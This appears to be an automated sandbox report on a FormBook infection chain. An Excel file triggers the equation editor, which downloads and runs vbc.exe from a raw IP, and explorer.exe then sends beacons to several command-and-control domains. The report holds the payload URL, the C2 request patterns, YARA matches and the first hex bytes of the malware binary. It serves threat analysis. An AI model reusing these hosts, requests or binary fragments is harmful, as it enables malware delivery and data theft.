                                                                                                                                                                Nov 20, 2020 12:07:03.698806047 CET192.168.2.228.8.8.80x9e1cStandard query (0)www.tnicholson.designA (IP address)IN (0x0001)

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                Nov 20, 2020 12:06:06.922523975 CET8.8.8.8192.168.2.220x708cName error (3)www.nanox.ltdnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:14.526599884 CET8.8.8.8192.168.2.220xa14dNo error (0)www.alloutdoorspeaker.comalloutdoorspeaker.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:14.526599884 CET8.8.8.8192.168.2.220xa14dNo error (0)alloutdoorspeaker.com137.59.52.234A (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:20.373017073 CET8.8.8.8192.168.2.220xccffNo error (0)www.teelinkz.comteelinkz.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:20.373017073 CET8.8.8.8192.168.2.220xccffNo error (0)teelinkz.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:30.625853062 CET8.8.8.8192.168.2.220x2f03No error (0)www.natcandy.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:30.625853062 CET8.8.8.8192.168.2.220x2f03No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:30.625853062 CET8.8.8.8192.168.2.220x2f03No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:30.625853062 CET8.8.8.8192.168.2.220x2f03No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:30.625853062 CET8.8.8.8192.168.2.220x2f03No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:30.625853062 CET8.8.8.8192.168.2.220x2f03No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:30.625853062 CET8.8.8.8192.168.2.220x2f03No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:30.625853062 CET8.8.8.8192.168.2.220x2f03No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:36.130682945 CET8.8.8.8192.168.2.220x3c4eNo error (0)www.californiapropiedades.comcaliforniapropiedades.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:36.130682945 CET8.8.8.8192.168.2.220x3c4eNo error (0)californiapropiedades.com67.227.214.78A (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:41.452959061 CET8.8.8.8192.168.2.220x6ec7No error (0)www.pornfilm3d.com104.24.122.89A (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:41.452959061 CET8.8.8.8192.168.2.220x6ec7No error (0)www.pornfilm3d.com172.67.143.182A (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:41.452959061 CET8.8.8.8192.168.2.220x6ec7No error (0)www.pornfilm3d.com104.24.123.89A (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:47.609066010 CET8.8.8.8192.168.2.220xf09aNo error (0)www.the-trinity-project.com185.119.173.57A (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:53.072963953 CET8.8.8.8192.168.2.220x4b92No error (0)www.crimson.schoolcrimson.schoolCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:53.072963953 CET8.8.8.8192.168.2.220x4b92No error (0)crimson.school34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:58.697033882 CET8.8.8.8192.168.2.220x4b93Name error (3)www.heritagediscovery.infononenoneA (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:07:03.852780104 CET8.8.8.8192.168.2.220x9e1cNo error (0)www.tnicholson.design65.254.250.119A (IP address)IN (0x0001)

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • 198.23.212.188
                                                                                                                                                                • www.alloutdoorspeaker.com
                                                                                                                                                                • www.teelinkz.com
                                                                                                                                                                • www.natcandy.com
                                                                                                                                                                • www.californiapropiedades.com
                                                                                                                                                                • www.pornfilm3d.com
                                                                                                                                                                • www.the-trinity-project.com
                                                                                                                                                                • www.crimson.school

                                                                                                                                                                HTTP Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                0192.168.2.2249165198.23.212.18880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Nov 20, 2020 12:05:20.609724998 CET0OUTGET /reg/vbc.exe HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                Host: 198.23.212.188
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Nov 20, 2020 12:05:20.729680061 CET1INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 20 Nov 2020 11:05:19 GMT
                                                                                                                                                                Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11
                                                                                                                                                                Last-Modified: Fri, 20 Nov 2020 08:11:07 GMT
                                                                                                                                                                ETag: "87000-5b48562f86225"
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Content-Length: 552960
                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 57 74 b7 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 68 08 00 00 06 00 00 00 00 00 00 8e 86 08 00 00 20 00 00 00 a0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 08 00 00 02 00 00 70 e7 08 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 86 08 00 4b 00 00 00 00 a0 08 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 66 08 00 00 20 00 00 00 68 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 a0 08 00 00 04 00 00 00 6a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 08 00 00 02 00 00 00 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 86 08 00 00 00 00 00 48 00 00 00 02 00 05 00 70 e6 07 00 d0 9f 00 00 03 00 00 00 10 00 00 06 f0 71 00 00 80 74 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 25 00 00 70 80 04 00 00 04 2a 36 03 02 7b 62 00 00 0a 28 5e 00 00 0a 2a 8a 03 6f 03 00 00 0a 02 7b 61 00 00 0a 7b 63 00 00 0a 02 7b 62 00 00 0a 6f 5a 00 00 0a 28 5e 00 00 0a 2a 2e 73 6f 00 00 0a 80 70 00 00 0a 2a 1e 03 6f 71 00 00 0a 2a 56 02 7b 11 00 00 04 6f 64 00 00 0a 03 28 12 00 00 2b 16 fe 01 2a 4a 02 7b 12 00 00 04 6f 31 00 00 0a 03 6f 76 00 00 0a 2a 4a 03 02 7b 13 00 00 04 6f
                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELWt_h @ p@@KB H.textf h `.rsrcBj@@.relocn@BpHpqtabdcefghijklmnprqstuvwzyx0123456789ABCDEFGHIJKLMNQPRTSVUWXYZ6(o*B(o&*2(t*(&*2to*F~~(**(*(((((o*&o*(*(*.r%p*6{b(^*o{a{c{boZ(^*.sop*oq*V{od(+*J{o1ov*J{o


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                1192.168.2.2249166137.59.52.23480C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Nov 20, 2020 12:06:14.689788103 CET582OUTGET /o56q/?mL0=FKXiaoKe3bemDRIUugzxxbPTRBaZLZeqFtxjN0B1OdNP6J3XvAf3eeDn7VbbZMxcUak0EA==&sFNp=jpX0Lfi0J HTTP/1.1
                                                                                                                                                                Host: www.alloutdoorspeaker.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Nov 20, 2020 12:06:15.324542999 CET583INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                                Location: https://www.alloutdoorspeaker.com/o56q/?mL0=FKXiaoKe3bemDRIUugzxxbPTRBaZLZeqFtxjN0B1OdNP6J3XvAf3eeDn7VbbZMxcUak0EA==&sFNp=jpX0Lfi0J
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Date: Fri, 20 Nov 2020 11:06:15 GMT
                                                                                                                                                                Server: LiteSpeed


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                2192.168.2.224916734.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Nov 20, 2020 12:06:20.390630960 CET584OUTGET /o56q/?sFNp=jpX0Lfi0J&mL0=kNK7qyUu0ssORWb2BQjm/XfEOCgL/rCBvS1q+B2CMQED5QxzM1Z/xIceLMT4/tikHS2Lng== HTTP/1.1
                                                                                                                                                                Host: www.teelinkz.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Nov 20, 2020 12:06:20.512625933 CET584INHTTP/1.1 403 Forbidden
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Fri, 20 Nov 2020 11:06:20 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 275
                                                                                                                                                                ETag: "5fb6e13a-113"
                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                3192.168.2.2249168198.54.117.21680C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Nov 20, 2020 12:06:30.798893929 CET585OUTGET /o56q/?sFNp=jpX0Lfi0J&mL0=txyYMtCM76zgLKXk1qYYn+5SCVWoTymC4Fy9/8gvc5WTXTsch9hYV+sG2t1iNylweztP4w== HTTP/1.1
                                                                                                                                                                Host: www.natcandy.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                4192.168.2.224916967.227.214.7880C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Nov 20, 2020 12:06:36.263312101 CET586OUTGET /o56q/?mL0=pV6faFGE09Anucwtu1kKnRp8occyZHoCKwW13VBtOuBMFJZe4NXXYoNYm7yc9vXPVF34hw==&sFNp=jpX0Lfi0J HTTP/1.1
                                                                                                                                                                Host: www.californiapropiedades.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Nov 20, 2020 12:06:36.393408060 CET587INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 706
                                                                                                                                                                Date: Fri, 20 Nov 2020 11:06:35 GMT
                                                                                                                                                                Server: LiteSpeed
                                                                                                                                                                Location: https://www.californiapropiedades.com/o56q/?mL0=pV6faFGE09Anucwtu1kKnRp8occyZHoCKwW13VBtOuBMFJZe4NXXYoNYm7yc9vXPVF34hw==&sFNp=jpX0Lfi0J
                                                                                                                                                                Vary: User-Agent
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                5192.168.2.2249170104.24.122.8980C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Nov 20, 2020 12:06:41.480900049 CET588OUTGET /o56q/?sFNp=jpX0Lfi0J&mL0=B+oguf8ZoLV3WGdfJzBRzAgDmcX+4hJ8FJ+I0/mWlmQn56ZLUkNDQwA/Y9AdAB6o/3r8rA== HTTP/1.1
                                                                                                                                                                Host: www.pornfilm3d.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                6192.168.2.2249171185.119.173.5780C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Nov 20, 2020 12:06:47.639481068 CET589OUTGET /o56q/?mL0=Lg4DNBfwCTdoZLnXKvmswQE2HeXzej7VDwiGjOCQv6fEN8TXR+UTrTnc2v5FsvAKWI4bvw==&sFNp=jpX0Lfi0J HTTP/1.1
                                                                                                                                                                Host: www.the-trinity-project.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Nov 20, 2020 12:06:48.025187016 CET589INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                Date: Fri, 20 Nov 2020 11:06:47 GMT
                                                                                                                                                                Server: Apache
                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                Location: http://the-trinity-project.com/o56q/?mL0=Lg4DNBfwCTdoZLnXKvmswQE2HeXzej7VDwiGjOCQv6fEN8TXR+UTrTnc2v5FsvAKWI4bvw==&sFNp=jpX0Lfi0J
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                X-Cache: MISS from lin-10-170-0-22.gridhost.co.uk
                                                                                                                                                                X-Cache-Lookup: MISS from lin-10-170-0-22.gridhost.co.uk:3128
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: DYNSRV=lin-10-170-0-22; path=/


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                7192.168.2.224917234.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Nov 20, 2020 12:06:53.091903925 CET590OUTGET /o56q/?sFNp=jpX0Lfi0J&mL0=9OrW47TrMTZH15Vmzbe9TQM6sSr1xjl4p0LLri3wKcTyHbeStzlrAaSeWLbT0hv9vCeuEg== HTTP/1.1
                                                                                                                                                                Host: www.crimson.school
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Nov 20, 2020 12:06:53.215748072 CET591INHTTP/1.1 403 Forbidden
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Fri, 20 Nov 2020 11:06:53 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 275
                                                                                                                                                                ETag: "5fb6e151-113"
                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                                Code Manipulations

                                                                                                                                                                Statistics

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                General

                                                                                                                                                                Start time:12:04:39
                                                                                                                                                                Start date:20/11/2020
                                                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                Imagebase:0x13f330000
                                                                                                                                                                File size:27641504 bytes
                                                                                                                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:12:04:58
                                                                                                                                                                Start date:20/11/2020
                                                                                                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:543304 bytes
                                                                                                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:12:05:00
                                                                                                                                                                Start date:20/11/2020
                                                                                                                                                                Path:C:\Users\Public\vbc.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                Imagebase:0xb80000
                                                                                                                                                                File size:552960 bytes
                                                                                                                                                                MD5 hash:BF75ED61E1B1F7B310EC1D999077C4DD
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
